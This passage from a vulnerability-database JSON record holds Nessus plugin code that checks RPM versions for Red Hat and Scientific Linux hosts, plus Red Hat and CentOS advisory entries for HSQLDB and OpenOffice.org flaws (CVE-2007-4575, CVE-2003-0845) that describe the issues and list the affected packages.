flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-sl_SI-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-sl_SI-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-sr_CS-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-sr_CS-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-ss_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ss_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-st_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-st_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-sv-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-sv-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-ta_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ta_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-te_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-te_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-th_TH-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-th_TH-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-tn_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-tn_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-tr_TR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-tr_TR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-ts_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ts_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-ur-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ur-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-ve_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ve_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-xh_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-xh_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-zh_CN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-zh_CN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-zh_TW-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-zh_TW-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-zu_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-zu_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-math-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-math-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-pyuno-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-pyuno-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-testtools-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-testtools-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-writer-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-writer-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-xsltfilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-xsltfilter-2.0.4-5.4.25\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:04", "bulletinFamily": "scanner", "description": "It was discovered that HSQLDB could allow the execution of arbitrary public static Java methods. A carefully crafted odb file opened in OpenOffice.org Base could execute arbitrary commands with the permissions of the user running OpenOffice.org. (CVE-2007-4575)\n\nIt was discovered that HSQLDB did not have a password set on the 'sa' user. If HSQLDB has been configured as a service, a remote attacker who could connect to the HSQLDB port (tcp 9001) could execute arbitrary SQL commands. (CVE-2003-0845)\n\nNote that in Scientific Linux 5, HSQLDB is not enabled as a service by default, and needs manual configuration in order to work as a service.", "modified": "2019-01-07T00:00:00", "id": "SL_20071205_OPENOFFICE_ORG__HSQLDB_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60324", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : openoffice.org, hsqldb on SL5.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60324);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/01/07 9:52:18\");\n\n script_cve_id(\"CVE-2003-0845\", \"CVE-2007-4575\");\n\n script_name(english:\"Scientific Linux Security Update : openoffice.org, hsqldb on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that HSQLDB could allow the execution of arbitrary\npublic static Java methods. A carefully crafted odb file opened in\nOpenOffice.org Base could execute arbitrary commands with the\npermissions of the user running OpenOffice.org. (CVE-2007-4575)\n\nIt was discovered that HSQLDB did not have a password set on the 'sa'\nuser. If HSQLDB has been configured as a service, a remote attacker\nwho could connect to the HSQLDB port (tcp 9001) could execute\narbitrary SQL commands. (CVE-2003-0845)\n\nNote that in Scientific Linux 5, HSQLDB is not enabled as a service by\ndefault, and needs manual configuration in order to work as a service.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0712&L=scientific-linux-errata&T=0&P=1009\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a005a6e6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"hsqldb-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"hsqldb-demo-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"hsqldb-javadoc-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"hsqldb-manual-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-base-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-calc-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-core-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-draw-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-emailmerge-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-graphicfilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-impress-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-javafilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-af_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-ar-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-as_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-bg_BG-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-bn-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-ca_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-cs_CZ-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-cy_GB-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-da_DK-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-de-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-el_GR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-es-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-et_EE-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-eu_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-fi_FI-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-fr-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-ga_IE-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-gl_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-gu_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-he_IL-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-hi_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-hr_HR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-hu_HU-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-it-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-ja_JP-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-kn_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-ko_KR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-lt_LT-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-ml_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-mr_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-ms_MY-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-nb_NO-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-nl-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-nn_NO-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-nr_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-nso_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-or_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-pa_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-pl_PL-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-pt_BR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-pt_PT-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-ru-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-sk_SK-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-sl_SI-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-sr_CS-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-ss_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-st_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-sv-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-ta_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-te_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-th_TH-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-tn_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-tr_TR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-ts_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-ur-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-ve_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-xh_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-zh_CN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-zh_TW-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-langpack-zu_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-math-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-pyuno-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-testtools-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-writer-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openoffice.org-xsltfilter-2.0.4-5.4.25\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:43:11", "bulletinFamily": "unix", "description": "OpenOffice.org is an office productivity suite.\r\nHSQLDB is a Java relational database engine used by OpenOffice.org Base.\r\n\r\nIt was discovered that HSQLDB could allow the execution of arbitrary public\r\nstatic Java methods. A carefully crafted odb file opened in OpenOffice.org\r\nBase could execute arbitrary commands with the permissions of the user\r\nrunning OpenOffice.org. (CVE-2007-4575)\r\n\r\nIt was discovered that HSQLDB did not have a password set on the 'sa' user.\r\n If HSQLDB has been configured as a service, a remote attacker who could\r\nconnect to the HSQLDB port (tcp 9001) could execute arbitrary SQL commands.\r\n(CVE-2003-0845)\r\n\r\nNote that in Red Hat Enterprise Linux 5, HSQLDB is not enabled as a service\r\nby default, and needs manual configuration in order to work as a service.\r\n\r\nUsers of OpenOffice.org or HSQLDB should update to these errata packages\r\nwhich contain backported patches to correct these issues.", "modified": "2017-09-08T12:12:36", "published": "2007-12-05T05:00:00", "id": "RHSA-2007:1048", "href": "https://access.redhat.com/errata/RHSA-2007:1048", "type": "redhat", "title": "(RHSA-2007:1048) Moderate: openoffice.org, hsqldb security update", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-12T14:47:07", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:1048\n\n\nOpenOffice.org is an office productivity suite.\r\nHSQLDB is a Java relational database engine used by OpenOffice.org Base.\r\n\r\nIt was discovered that HSQLDB could allow the execution of arbitrary public\r\nstatic Java methods. A carefully crafted odb file opened in OpenOffice.org\r\nBase could execute arbitrary commands with the permissions of the user\r\nrunning OpenOffice.org. (CVE-2007-4575)\r\n\r\nIt was discovered that HSQLDB did not have a password set on the 'sa' user.\r\n If HSQLDB has been configured as a service, a remote attacker who could\r\nconnect to the HSQLDB port (tcp 9001) could execute arbitrary SQL commands.\r\n(CVE-2003-0845)\r\n\r\nNote that in Red Hat Enterprise Linux 5, HSQLDB is not enabled as a service\r\nby default, and needs manual configuration in order to work as a service.\r\n\r\nUsers of OpenOffice.org or HSQLDB should update to these errata packages\r\nwhich contain backported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-January/014624.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-January/014625.html\n\n**Affected packages:**\nhsqldb\nhsqldb-demo\nhsqldb-javadoc\nhsqldb-manual\nopenoffice.org\nopenoffice.org-base\nopenoffice.org-calc\nopenoffice.org-core\nopenoffice.org-draw\nopenoffice.org-emailmerge\nopenoffice.org-graphicfilter\nopenoffice.org-impress\nopenoffice.org-javafilter\nopenoffice.org-langpack-af_ZA\nopenoffice.org-langpack-ar\nopenoffice.org-langpack-as_IN\nopenoffice.org-langpack-bg_BG\nopenoffice.org-langpack-bn\nopenoffice.org-langpack-ca_ES\nopenoffice.org-langpack-cs_CZ\nopenoffice.org-langpack-cy_GB\nopenoffice.org-langpack-da_DK\nopenoffice.org-langpack-de\nopenoffice.org-langpack-el_GR\nopenoffice.org-langpack-es\nopenoffice.org-langpack-et_EE\nopenoffice.org-langpack-eu_ES\nopenoffice.org-langpack-fi_FI\nopenoffice.org-langpack-fr\nopenoffice.org-langpack-ga_IE\nopenoffice.org-langpack-gl_ES\nopenoffice.org-langpack-gu_IN\nopenoffice.org-langpack-he_IL\nopenoffice.org-langpack-hi_IN\nopenoffice.org-langpack-hr_HR\nopenoffice.org-langpack-hu_HU\nopenoffice.org-langpack-it\nopenoffice.org-langpack-ja_JP\nopenoffice.org-langpack-kn_IN\nopenoffice.org-langpack-ko_KR\nopenoffice.org-langpack-lt_LT\nopenoffice.org-langpack-ml_IN\nopenoffice.org-langpack-mr_IN\nopenoffice.org-langpack-ms_MY\nopenoffice.org-langpack-nb_NO\nopenoffice.org-langpack-nl\nopenoffice.org-langpack-nn_NO\nopenoffice.org-langpack-nr_ZA\nopenoffice.org-langpack-nso_ZA\nopenoffice.org-langpack-or_IN\nopenoffice.org-langpack-pa_IN\nopenoffice.org-langpack-pl_PL\nopenoffice.org-langpack-pt_BR\nopenoffice.org-langpack-pt_PT\nopenoffice.org-langpack-ru\nopenoffice.org-langpack-sk_SK\nopenoffice.org-langpack-sl_SI\nopenoffice.org-langpack-sr_CS\nopenoffice.org-langpack-ss_ZA\nopenoffice.org-langpack-st_ZA\nopenoffice.org-langpack-sv\nopenoffice.org-langpack-ta_IN\nopenoffice.org-langpack-te_IN\nopenoffice.org-langpack-th_TH\nopenoffice.org-langpack-tn_ZA\nopenoffice.org-langpack-tr_TR\nopenoffice.org-langpack-ts_ZA\nopenoffice.org-langpack-ur\nopenoffice.org-langpack-ve_ZA\nopenoffice.org-langpack-xh_ZA\nopenoffice.org-langpack-zh_CN\nopenoffice.org-langpack-zh_TW\nopenoffice.org-langpack-zu_ZA\nopenoffice.org-math\nopenoffice.org-pyuno\nopenoffice.org-testtools\nopenoffice.org-writer\nopenoffice.org-xsltfilter\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-1048.html", "modified": "2008-01-19T00:17:08", "published": "2008-01-19T00:14:54", "href": "http://lists.centos.org/pipermail/centos-announce/2008-January/014624.html", "id": "CESA-2007:1048", "title": "hsqldb, openoffice.org security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}